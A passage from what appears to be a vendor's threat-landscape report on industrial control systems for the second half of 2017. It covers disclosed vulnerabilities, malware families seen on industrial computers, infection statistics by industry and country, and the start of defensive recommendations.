area of research was the assessment of the information security status of internet of things (IoT), components, including industrial internet of things (IIoT) components.\n\nKaspersky Lab experts are working with vendors to improve the security of their solutions with respect to 11 vulnerabilities identified. Vulnerabilities were found in the following components and solutions:\n\n * smart cameras,\n * hardware-based IIoT solutions.\n\nIt should be noted that vulnerabilities in implementations of OPC UA standards, which are discussed above, also directly affect IIoT security.\n\n### Vulnerabilities in industrial routers\n\nIn the past year, 18 vulnerabilities were identified in industrial networking equipment from different vendors. Typical vulnerabilities: information disclosure, privilege escalation, arbitrary code execution, denial of service.\n\n### Working with software vendors\n\nWith respect to information on the vulnerabilities identified, Kaspersky Lab follows the principle of responsible information disclosure, promptly reporting vulnerabilities to the respective software vendors.\n\nIn 2017, Kaspersky Lab ICS CERT researchers actively collaborated with various companies to ensure that the vulnerabilities identified would be closed.\n\nOf the 63 vulnerabilities identified by Kaspersky Lab ICS CERT in 2017, vendors closed 26. Vulnerabilities were closed by Siemens, General Electric, Rockwell Automation, Gemalto and the [OPC Foundation](<https://en.wikipedia.org/wiki/OPC_Foundation>) industrial consortium.\n\nIt should be noted that most vendors of software for industrial automation systems that we have worked with have lately been devoting much more care and resources to the task of closing the vulnerabilities identified and fixing information security issues in their products, including their earlier versions.\n\nAt the same time, the issue of closing vulnerabilities in industrial automation systems remains relevant. In many cases, it takes large vendors a long time to close vulnerabilities in their products. Sometimes software vendors decide to patch only new versions of a vulnerable product, which they are planning to release in the future.\n\nIn addition, some vendors still need to improve the organizational and technical aspects of the procedures they use to inform customers about the vulnerabilities patched. Even after an update has been released, many users are unaware of the relevant security issue and use vulnerable versions of the product. This is particularly important for embedded software, as well as the technologies and specific program modules used by numerous third-party vendors (one example can be found [here](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>)).\n\nPositive examples include Siemens and the OPC Foundation, which have quickly closed the vulnerabilities identified and released public advisories on existing vulnerabilities.\n\n## Malware in industrial automation systems\n\nAs we have [mentioned before](<https://ics-cert.kaspersky.com/reports/2017/03/28/threat-landscape-for-industrial-automation-systems-in-the-second-half-of-2016/#3l3>), many industrial companies use modern networking technologies that improve the transparency and efficiency of enterprise management processes, as well as providing flexibility and fault tolerance for all tiers of industrial automation. As a result, industrial networks are increasingly similar to corporate networks \u2013 both in terms of use case scenarios and in terms of the technologies used. The unfortunate flip side of this is that internet threats, as well as other traditional IT threats, increasingly affect the industrial networks of modern organizations.\n\nIn the second half of 2017, Kaspersky Lab security solutions installed on industrial automation systems detected over 17.9 thousand different malware modifications from about 2.4 thousand different malware families.\n\n### Accidental infections\n\nIn the vast majority of cases, attempts to infect ICS computers are accidental and are not part of targeted attacks. Consequently, the functionality implemented in malware is not specific to attacks on industrial automation systems. However, even without ICS-specific functionality, a malware infection can have dire consequences for an industrial automation system, including an emergency shutdown of the industrial process. This was demonstrated by the WannaCry outbreak in May 2017, when several enterprises in different industries had to suspend their industrial processes after being infected with the encryption malware. We wrote about encryption malware-related threats in our [previous report](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/>) and several articles (see [here](<https://ics-cert.kaspersky.com/reports/2017/06/22/wannacry-on-industrial-networks/>) and [here](<https://ics-cert.kaspersky.com/alerts/2017/06/29/more-than-50-percent-of-organizations-attacked-by-expetr-petya-cryptolocker-are-industrial-companies/>)).\n\n#### Unexpected consequences of the WannaCry outrbreak\n\nIt is important to note that some IT threats can do much more significant harm in an industrial network than in an office network. To demonstrate this, we look at two incidents investigated by the Kaspersky Lab ICS-CERT team.\n\nIn H2 2017, we were approached by several industrial enterprises at once, where mass infections of industrial networks with WannaCry encryption malware had been detected. It was later determined that the initial infections of office networks at the victim companies had in all the cases taken place back in the first half of 2017, at the height of the WannaCry outbreak. However, the infections were not noticed until the malware propagated to the enterprises' industrial networks. As it turned out during investigation, encryption functionality in the malware samples was damaged and the infected systems on corporate networks continued to operate normally, without any failures. However, the infection of industrial networks in these cases had unexpected negative consequences.\n\nAt one of the enterprises infected by WannaCry, the workstations used by operators started to bring up the Blue Screen of Death all the time, leading to emergency reboots. The reason for this unexpected consequence of infection was that the machines ran Windows XP. It is a well-known fact that the DoublePulsar exploit used by WannaCry to propagate causes WindowsXP to crash, resulting in a Blue Screen of Death and a reboot. In cases when numerous machines in the industrial segment of an organization's network are infected, WindowsXP machines are often attacked and go into emergency reboots. As a result, operators are rendered incapable of monitoring and controlling the industrial process. This makes WannaCry a denial-of-service attack tool of sorts.\n\nIn another incident, the propagation of WannaCry caused some of the devices on an enterprise's industrial network to become temporarily unavailable during periods when the network activity of the malware coincided with certain stages in the industrial process. This resulted in emergency interruptions of an industrial process that was critical for the enterprise for an average of 15 minutes.\n\n#### Cryptocurrency miners in industrial network infrastructure\n\nAccording to Kaspersky Lab ICS CERT data, cryptocurrency mining programs attacked 3.3% of industrial automation system computers during the period from February 2017 to January 2018.\n\nUp to August 2017, the percentage of ICS computers attacked by cryptocurrency miners did not exceed 1%. This figure grew in September and did not go back to less than 1% for the rest of 2017. In October, cryptocurrency miner attacks against ICS computers peaked, with 2.07% of ICS computers being attacked.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130449/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-6.png>)\n\n_Percentage of ICS computers attacked by cryptocurrency mining malware_\n\nLike other malware infecting systems at industrial enterprises, cryptocurrency miners can pose a threat to industrial process monitoring and control. In the process of its operation, malware of this type creates a significant load on the computer's computational resources. An increased load on processors can negatively affect the operation of the enterprise's ICS components and threaten their stability.\n\nAccording to our assessments, in most cases cryptocurrency miners infect ICS computers accidentally. There is no reliable information on machines that are part of the industrial network infrastructure being infected as a result of targeted attacks the goal of which is to mine cryptocurrencies, with the exception of cases when miners are installed by unscrupulous employees of victim enterprises. The cryptocurrency mining malware typically enters the industrial network infrastructure from the internet or, less commonly, from removable media or network shares.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130456/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-7.png>)\n\n_Sources of ICS computer infections with cryptocurrency miners_ \nPercentage of systems attacked, February 2017 \u2013 January 2018_\n\nCryptocurrency miners have infected numerous websites, including those of industrial companies. In such cases, cryptocurrencies are mined on the systems of users who visit infected web resources. This technique is called cryptojacking.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130503/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-8.png>)\n\n__Screenshot showing a fragment of code found on a web resource infected with mining malware __\n\n#### Botnet agents in the industrial network infrastructure\n\nIn most cases, the functionality of botnet agents includes searching for and stealing financial information, stealing authentication data, brute forcing passwords, sending spam, as well as conducting attacks on specified remote internet resources, including denial-of-service (DDoS) attacks. In addition, in cases where a botnet agent attacks third-party resources (such cases have been detected), the companies that own the IP addresses from which the attacks are launched may face certain reputational risks.\n\nAlthough the destructive activity of botnet agents is not specifically designed to disrupt the operation of any industrial system, an infection with this type of malware may pose a significant threat to a facility that is part of the industrial infrastructure. Malware of this type can cause network failures, denial of service (DoS) of the infected system and other devices on the network. It is also common for malware to contain errors in its code and/or be incompatible with software used to control the industrial infrastructure, potentially resulting in the disruption of industrial process monitoring and control.\n\nAnother danger associated with botnet agents is that malware of this type often includes data collection functionality and, like backdoor malware, enables the attackers to control the infected machine surreptitiously. System data collected by bots by default is sufficient for accurately identifying the company that owns the system and the type of the infected system. What's more, access to machines infected with botnet agents is often put up for sale at specialized exchanges on the Darknet. Consequently, threat actors interested in infected industrial control systems can gain access to a victim company's sensitive data and/or systems used to control the industrial infrastructure.\n\nIn 2017, 10.8% of all ICS systems were attacked by botnet agents. Moreover, botnet agent attack statistics show that 2% of ICS systems were attacked by several malicious programs of this type at once.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130511/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-9.png>)\n\n_Percentage of ICS computers attacked by botnet agents in 2017_\n\nThe main sources of botnet agent attacks on ICS systems in 2017 were the internet, removable media and email messages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130518/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-10.png>)\n\n_Sources of ICS infection with botnet agents, percentage of ICS computers attacked, 2017_\n\nThis once again demonstrates the need for access control to ensure that information is exchanged securely between an enterprise's industrial network and other networks, as well as the need to block unauthorized removable media from connecting to ICS systems and to install tools designed to detect and filter malicious objects from email messages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130524/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-11.png>)\n\n_Top 5 botnet agent most commonly found on ICS systems in 2017, \npercentage of ICS computers attacked_\n\nNearly two percent of all systems analyzed were attacked with Virus.Win32.Sality malware. In addition to infecting other executable files, this malware includes the functionality of resisting antivirus solutions and downloading additional malicious modules from the command-and-control server. The most widespread Sality modules are components for sending spam, stealing authentication data stored on the system and downloading and installing other malware.\n\nThe Dinihou botnet agent, which attacked 0.9% of ICS systems analyzed, is in second position. The malware includes functionality that enables the attackers to upload an arbitrary file from an infected system, creating the threat of sensitive data leaks for victim organizations. In addition, both Worm.VBS.Dinihou and Virus.Win32.Nimnul, which is in third place with 0.88%, can be used to download and install other malware on infected systems.\n\nMost modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\nThe fifth position is taken up by Backdoor.Win32.Androm, which ranked highest based on the number of attacks on ICS systems in H2 2016. The malware provides the attackers with a variety of information on the infected system and enables them to download and install modules for performing destructive activities, such as stealing sensitive data.\n\n### Targeted attacks\n\n2017 saw the publication of information on two targeted attacks on systems that are part of the industrial infrastructure \u2013 [Industroyer](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/#21>) and [Trisis/Triton](<https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>). In these attacks, for the first time since Stuxnet, threat actors created their own implementations of industrial network protocols, gaining the ability to communicate with devices directly.\n\n#### Trisis/Triton\n\nIn December 2017, researchers reported discovering previously unknown malware that targeted critical infrastructure systems. The discovery was made as a result of investigating an incident at an unnamed industrial enterprise. The malicious program was dubbed Triton or Trisis.\n\nThe malware is a modular framework that can automatically find Triconex Safety Controllers on the enterprise network, get information on their operating modes and plant malicious code on these devices. Trisis/Triton embeds a backdoor in the device's firmware, enabling the attackers to remotely read and modify not only the code of the legitimate control program, but also the code of the compromised Triconex device's firmware. With such capabilities, attackers can do serious damage to the enterprise's industrial process. The least harmful of possible negative consequences is the system's emergency shutdown and interruption of the industrial process. It was this type of event that caused a victim organization to launch an investigation, which resulted in the attack being detected.\n\nIt remains unknown how the attackers penetrated the enterprise's infrastructure. What is known is that they must have been inside the compromised organization's network for a sufficiently long time (several months) and used legitimate software and 'dual-use' utilities for lateral movement and privilege escalation.\n\nAlthough the attack was designed to modify code on Triconex devices, the code that the attackers were apparently trying to inject in the last stage of the attack has never been found, so it is currently impossible to determine the final objective of the attack.\n\n#### Spear phishing \u2014 Formbook spyware\n\nSpear phishing attacks on industrial organizations continued in the second half of 2017. We have already [written](<https://ics-cert.kaspersky.com/reports/2017/06/15/nigerian-phishing-industrial-companies-under-attack/>) about spear phishing used by threat actors in Business Email Compromise (BEC) attacks. Compared to attacks described earlier, the attackers' tactics have not changed significantly. However, in addition to known Trojan-Spy malware sent in phishing emails to global industrial and energy companies (FareIT, HawkEye, ISRStealer, etc.), a new representative of this malware class \u2013 Formbook \u2013 gained popularity in the second half of 2017.\n\nFormbook attacks involve sending phishing emails with malicious Microsoft Office documents attached. To download and install malware on target systems, these documents exploit the CVE-2017-8759 vulnerability or use macros. Some phishing emails include attached archives of different formats containing the malicious program's executable file. Examples of attached file names:\n\n * RFQ for Material Equipment for Aweer Power Station H Phase IV.exe\n * Scanned DOCUMENTS & Bank Details For Confirmation.jpeg (Pages 1- 4) -16012018. jpeg.ace\n * PO & PI Scan.png.gz\n * zip\n * QUOTATION LISTS.CAB\n * shipping receipts.ace\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130531/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-12.png>)\n\n_Sample phishing email used to distribute Formbook_\n\nIn terms of implementation and the techniques used to obfuscate the code and encrypt the payload, Formbook differs from its 'peers' in that its functionality is more extensive. In addition to standard spyware features, such as making screenshots, capturing keypresses and stealing passwords stored in browsers, Formbook can steal sensitive data from HTTP/HTTPS/SPDY/HTTP2 traffic and web forms. Additionally, the malware implements remote system control functionality and uses an unusual technique to resist the analysis of network traffic. The Trojan generates a set of URLs to which it is going to connect, using a list of legitimate domains stored in its body. It then adds one URL for its command-and-control server. In this way, the malware attempts to mask its connections to the malicious domain by sending numerous requests to legitimate resources, making its detection and analysis more difficult.\n\n## Threat statistics\n\n_All statistical data used in this report was collected using the _[_Kaspersky Security Network_](<https://kas.pr/Gzu1>)_ (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to the product limitations and regulatory restrictions._\n\n### Methodology\n\nThe data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:\n\n * supervisory control and data acquisition (SCADA) servers,\n * data storage servers (Historian),\n * data gateways (OPC),\n * stationary workstations of engineers and operators,\n * mobile workstations of engineers and operators,\n * Human Machine Interface (HMI).\n\nThe statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.\n\nFor the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of _unique_ computers attacked to all computers in our sample from which we received anonymized information during the reporting period.\n\nICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.\n\nWorkstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.\n\nAs a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 40% of all machines have regular or full-time internet connections. The remaining machines connect to the Internet no more than once a month, many less frequently than that.\n\n### Percentage of computers attacked\n\nIn the second half of 2017, Kaspersky Lab products blocked attempted infections on **37.8%** of ICS computers protected by them, which is 0.2 percentage points more than in the first half of 2017 and 1.4 percentage points less than in the second half of 2016.\n\nJune \u2013 August 2017 saw a decline in the number of attacked computers. However, in September there was a notable increase in cybercriminal activity, with the proportion of attacked machines rising to 20% and not falling below that level again for the rest of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130539/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-13.png>)\n\n__Percentage of ICS computers attacked globally by month, 2017__\n\nWhen comparing these values with the same period in 2016, we see that the July numbers are practically identical. However, for all other months the percentage of attacked machines in 2016 was higher than in 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130545/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-14.png>)\n\n_Percentage of ICS computers attacked globally by month, H2 2017 vs H2 2016_\n\nA certain decrease in the percentage of computers attacked can be attributed to several factors. It is likely that one has to do with industrial enterprises paying more attention to the security of industrial segments on their networks. According to our experts' assessments, changes for the better may be largely due to simple measures: enterprises have begun to conduct audits of the industrial segments of their networks, train employees in the principles of cyber-hygiene, more properly differentiate access rights between the corporate and the industrial segments of their network, etc.\n\n### Percentage of ICS computers attacked in different industries\n\nAccording to our assessment, medium-size and large companies with mature IT security processes tend to use Kaspersky Lab corporate solutions (mainly Kaspersky Industrial CyberSecurity and Kaspersky Endpoint Security) to safeguard their ICS infrastructure. Many smaller organizations and individual engineers, along with companies whose IT and OT cybersecurity still leaves much to be desired, may rely on Kaspersky Lab consumer solutions to protect their ICS computers. The percentage of such computers attacked by malware during the reporting period is significantly higher compared to the corresponding figures for computers protected by corporate products.\n\nWe intentionally excluded statistics coming from our consumer solutions when analyzing attacks on industrial facilities in different industries, using only telemetry data coming from Kaspersky Lab products for corporate users. This resulted in lower average attacked computers percentage values than for the rest of the analysis results presented in this report, where both Kaspersky Lab corporate and consumer product statistics were used.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130552/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-15.png>)\n\n_Percentage of ICS computers attacked in different industries*, H2 2017 vs H1 2017_\n\n*In this report, unlike our previous reports, we calculated the percentage of attacked ICS computers for each industry (the percentage of ICS computers attacked in an industry to all ICS computers in that industry).\n\nIn previous reports, we included the distribution of attacked ICS computers by industry (the percentage of computers attacked in a given industry to all attacked computers in our sample).\n\nAccording to statistics on attacks against facilities in different industries, nearly all industries demonstrate similar percentages of attacked ICS computers, which are in the range from 26 to 30 percent. We believe this may be due to the similarity of ICS architectures used to automate industrial processes at enterprises in various industries and, possibly, similarities in the processes used by enterprises to exchange information with external entities and inside the enterprises themselves.\n\nTwo industries were attacked more than others during the reporting period: the figures for Energy (38.7%) and Engineering & ICS Integrators (35.3%) are above 35%.\n\nWe believe that the high percentage of attacked ICS systems in the energy sector may be explained, on the one hand, by the greater network connectivity of electric power sector facilities (compared to facilities in other industries) and, on the other hand, perhaps by the fact that, on average, more people have access to the industrial control systems of energy sector facilities than to those at enterprises in other industries.\n\nThe supply chain attack vector has infamously been used in some devastating attacks in recent years, which is why the high percentage of attacked ICS computers in Engineering and ICS Integration businesses is a problem that is serious enough to be noticed.\n\nThe only industry whose figures showed a significant growth in the six months (+ 5.2 p.p.) is Construction (31.1%). The reason for the high percentage of ICS computers attacked in construction organizations could be that, for enterprises in the industry, industrial control systems often perform auxiliary functions, were introduced a relatively short time ago and are consequently at the periphery of company owners' and managers' attention. The upshot of this may be that objectives associated with protecting these systems from cyberthreats are regarded as having a relatively low priority. Whatever the reason for the high percentage of attacks reaching industrial control systems in construction and engineering, the fact seems sufficiently alarming. Construction is known to be a highly competitive business and cyberattacks on industrial organizations in this industry can be used as a means of unfair competition. So far, cyberattacks have been used in the construction industry mainly for purposes associated with the theft of commercial secrets. Infecting industrial control systems may provide threat actors with a new weapon in their fight against competitors.\n\nThe three least attacked industries are Mining (23.5%), Logistic & Transportation (19.8%) and ICS Software Development (14.7%).\n\nICS vendor infections might be very dangerous, because the consequences of an attack, spread over the infected vendor's partner ecosystem and customer base, could be dramatic, as we saw in the recent wide-scale incidents, such as the exPetr malware epidemic.\n\nThis report includes information on ICS computers at educational facilities. These figures include not only ICS systems used in demonstration stands and labs performing instructional and research functions, but also in industrial automation systems of various facilities that are part of the infrastructure of educational establishments, such as power supply systems (including power generation and distribution), utilities, etc., as well as ICS used in pilot production facilities.\n\nThe figure for educational establishments can be regarded as representing the \"background level\" of accidental threats affecting ICS systems, considering systems at educational establishments to be as insecure as such systems can get. This is because ICS systems at educational establishments are usually connected to the respective organizations' general-purpose networks and are less isolated from the outside world than the systems of industrial facilities.\n\nAt the same time, we believe that attacks on ICS systems at educational establishments can also pose a significant threat to enterprises in different real-sector industries \u2013 primarily because universities/colleges maintain working contacts and engage in collaboration with industrial enterprises. This includes joint research labs, engineering and development centers, personnel training and career development centers, etc.\n\nIn addition, such ICS systems can be used by attackers to test and debug malicious code and refine attacks against real-sector enterprises.\n\nEducation demonstrates the greatest difference between the H1 and H2 percentages of ICS systems attacked. The high figure for H1 was due to the large number of internet-borne attacks, as well as attacks by malware belonging to the [Trojan.Multi.Powercod](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>) family. That malware uses techniques that are similar to those described by our colleagues [here](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>). In H1 2017, 9.8% of ICS computers in educational establishments from our sample were attacked by Powercod Trojans. In H2, the corresponding figure was 0.7%.\n\n### Sources of industrial automation system infection\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130558/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-16.png>)\n\n_Main sources of threats blocked on ICS computers, \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nIn the second half of 2017, most of the numbers for the main infection sources remained at H1 2017 levels.\n\nFor computers that are part of the industrial infrastructure, the internet remains the main source of infection. Contributing factors include interfaces between corporate and industrial networks, availability of limited internet access from industrial networks, and connection of computers on industrial networks to the internet via mobile phone operator networks (using mobile phones, USB modems and/or Wi-Fi routers with 3G/LTE support). Contractors, developers, integrators and system/network administrators that connect to the control network externally (directly or remotely) often have unrestricted internet access. Their computers are in the highest-risk group and can be used by malware as a channel for penetrating the industrial networks of the enterprises they serve. As we mentioned above, about 40% of computers in our sample connect to the internet on a regular basis. It should be noted that, in addition to malicious and infected websites, the \"Internet\" category includes phishing emails and malicious attachments opened in web-based email services (in browsers).\n\nExperts from Kaspersky Lab ICS-CERT note that malicious programs and scripts built into email message bodies are often used in targeted attacks on industrial enterprises. In most cases, the attackers distribute emails with malicious attachments in office document formats, such as Microsoft Office and PDF, as well as archives containing malicious executable files.\n\nThere has also been a 1.7 p.p. decrease in the proportion of threats detected while scanning removable media. This is an important indicator, because such devices are often used to transfer information in industrial networks.\n\nThe other figures did not change appreciably.\n\n### Classes of malware\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130605/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-17.png>)\n\n_Malware classes, percentage of ICS computers attacked, H2 2017_\n\nTrojan malware, which is designed to penetrate the systems being attacked, deliver and launch other malware modules, remains relevant to ICS computers. The malicious code of these programs was most commonly written in scripting languages (Javascript, Visual Basic Script, Powershell, AutoIt in the AutoCAD format) or took the form of Windows shortcuts (.lnk) that pointed to the next malicious modules.\n\nThese Trojans most often tried to download and execute the following malware as main modules:\n\n * spyware Trojans (Trojan-Spy and Trojan-PSW)\n * ransomware (Trojan-Ransom)\n * backdoors (Backdoor)\n * remote administration tools installed without authorization (RAT)\n * Wiper type programs (KillDisk) designed to delete (wipe) data on the hard drive and render the computer unusable\n\nMalware infections of computers on an industrial network can result in the loss of control or the disruption of industrial processes.\n\n### Platforms used by malware\n\nIn the second half of 2017, we saw a significant increase in the percentage of ICS computers affected by malware written for the JavaScript platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130613/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-18.png>)\n\n_Platforms used by malware, percentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nThe main reason for growing figures for the JavaScript platform is the increase in the number of phishing emails that include a loader for Trojan-Ransom.Win32.Locky.\n\nIn the latest versions of such emails, the attackers used a fax-received notification template.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130621/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-19.png>)\n\nThe phishing emails include an attachment \u2013 an obfuscated loader written in JavaScript and designed to download and execute the main malicious module from servers controlled by the attackers.\n\nIt is important to note that threat actors often attack legitimate websites in order to host malware components on these sites. Threat actors do this to hide malicious traffic behind legitimate domains to mask the traces of an attack.\n\nCryptocurrency miners also made a small contribution to the increase in the share of the JavaScript platform \u2013 both the versions for browsers and the script-based loaders of miners for the Windows platform.\n\n### Geographical distribution of attacks on industrial automation systems\n\nThe map below shows the percentages of industrial automation systems attacked to the total number of such systems in each country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130629/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-20.png>)\n\n_Geographical distribution of attacks on industrial automation systems, H2 2017 \nPercentage of attacked ICS computers in each country_\n\nTOP 15 countries by percentage of ICS computers attacked:\n\n| **Country*** | **% of systems attacked** \n---|---|--- \n1 | Vietnam | 69.6 \n2 | Algeria | 66.2 \n3 | Morocco | 60.4 \n4 | Indonesia | 60.1 \n5 | China | 59.5 \n6 | Egypt | 57.6 \n7 | Peru | 55.2 \n8 | Iran | 53.0 \n9 | India | 52.4 \n10 | Kazakhstan | 50.1 \n11 | Saudi Arabia | 48.4 \n12 | Mexico | 47.5 \n13 | Russia | 46.8 \n14 | Malaysia | 46.7 \n15 | Turkey | 44.1 \n \n*_Countries in which the number of ICS computers monitored by Kaspersky Lab ICS CERT was insufficient to obtain representative data sets were excluded from the ranking._\n\nThe Top 5 has remained unchanged since H1 2017.\n\nThe least affected countries in this ranking are Israel (8.6%), Denmark (13.6%), the UK (14.5%), the Netherlands (14.5%), Sweden (14.8%) and Kuwait (15.3%).\n\nEgypt has moved from ninth place to sixth \u2013 the percentage of attacked ICS machines in that country grew by 6.1 p.p. This is the most significant growth among all countries of the world. Internet threats accounted for most of the growth in the percentage of attacked ICS computers in Egypt. Among the internet threats detected, the most common were sites infected with script-based cryptocurrency miners and attempts to download malware by following URL links.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130636/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-21.png>)\n\n_Main sources of threats blocked on ICS computers in Egypt \npercentage of ICS computers attacked, H2 2017 vs H1 2017_\n\nMalware distributed via removable media is also a real problem for many ICS in Egypt. Malware loaders distributed on removable media are disguised as existing user files on the removable drive, increasing the chances of a successful attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130643/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-22.png>)\n\n_Examples of names used for loaders of malware distributed via removable media that were blocked on ICS computers in Egypt in H2 2017_\n\nIn most cases, the loaders that we detected were designed to launch the malware module responsible for infecting the system, including downloading the main module, infecting removable media and network shares and propagating via email/instant messengers to an existing list of contacts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130652/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-23.png>)\n\n_Malicious code for the AutoIt platform, launched by a malicious .lnk loader \nblocked on an ICS computer in Egypt in H2 2017_\n\nIn Russia during H2 2017, 46.8% of ICS computers were attacked at least once \u2013 a 3.8 p.p. rise on H1 2017. This saw Russia move up from 21st to 13th.\n\nThe proportions of attacked ICS machines vary greatly between different regions of the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130701/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-24.png>)\n\n_Percentage of ICS systems attacked in regions of the world, H2 2017 vs H1 2017_\n\nAll regions can be assigned to one of three groups according to the percentage of attacked ICS machines:\n\n 1. Proportion of attacked ICS systems below 30%. This group includes North America and Europe, where the situation looks the most peaceful. Kaspersky Lab ICS CERT specialists say this does not necessarily mean that industrial enterprises in these regions are less frequently attacked by cybercriminals; rather, it could be that more attention is paid to ensuring information security at industrial enterprises in these regions, which results in fewer attacks reaching ICS.\n 2. Proportion of attacked ICS systems between 30% and 50%. This group includes Latin America, Russia and the Middle East.\n 3. Proportion of attacked ICS systems above 50%. The situation is most acute in Africa and the Asia-Pacific region.\n\nIt should be noted that values may differ significantly between countries within the same region. This may be due to different practices and approaches to ICS information security in those countries.\n\nIn particular, the Asia-Pacific region includes Vietnam with the highest global proportion of attacked ICS systems (69.6%) alongside countries such as Japan (25%), Australia (24.1%) and Singapore (23.2%), where figures did not exceed 25%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130707/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-25.png>)\n\n_Percentage of attacked ICS computers in Asia-Pacific countries, H2 2017 vs H1 2017_\n\nIn Europe, Denmark's score (13.6%) was not only the lowest in the region but also one of the lowest globally, while the proportions of attacked ICS systems in Belarus (41%), Portugal (42.5%) and Ukraine (41.4%) were all above 40%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130713/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-26.png>)\n\n_Percentage of attacked ICS computers in Europe, H2 2017 vs H1 2017_\n\nLet's now look at the sources of attacks that affected ICS systems in different regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130719/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-27.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130725/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-28.png>)\n\n_Main sources of threats blocked on ICS computers in different regions, H2 2017_\n\nIn all regions of the world, the internet remains the main source of attacks. However, in Europe and North America, the percentage of blocked web-borne attacks is substantially lower than elsewhere. This may be because most enterprises operating in those regions adhere to information security standards. In particular, internet access is restricted on systems that are part of industrial networks. The situation is similar for infected removable devices: the highest numbers are seen in Africa and the Asia-Pacific region, while the lowest are in Europe and North America. These figures also reflect the level of compliance with information security standards and, in particular, whether restrictions are in place to prevent the connection of unauthorized removable media to industrial infrastructure systems.\n\nCuriously, in spite of the sufficiently high overall percentage of attacks that reached ICS systems, the percentages of ICS computers attacked via removable media and email clients in Russia were relatively small \u2013 4.4% and 1.4% respectively. One possible explanation is that risks associated with these attack vectors are largely mitigated through organizational measures, as well as removable media and email handling practices established at industrial enterprises. This interpretation is reassuring, since removable media and email are often used as penetration vectors in sophisticated targeted and APT attacks.\n\nFor countries of the Middle East, email was a significant (5%) source of infection, with the region leading the ranking based on this parameter.\n\n## Our recommendations\n\nTo prevent accidental infections in industrial networks, we recommend taking a set of measures designed to secure the internal and external perimeters of these networks.\n\nThis includes, first and foremost, measures required to provide secure remote access to automation systems and secure transfer of data between the industrial network and other networks that have different trust levels:\n\n * Systems that have full-time or regular connections to external networks (mobile devices, VPN concentrators, terminal servers, etc.) should be isolated into a separate segment of the industrial network \u2013 the demilitarized zone 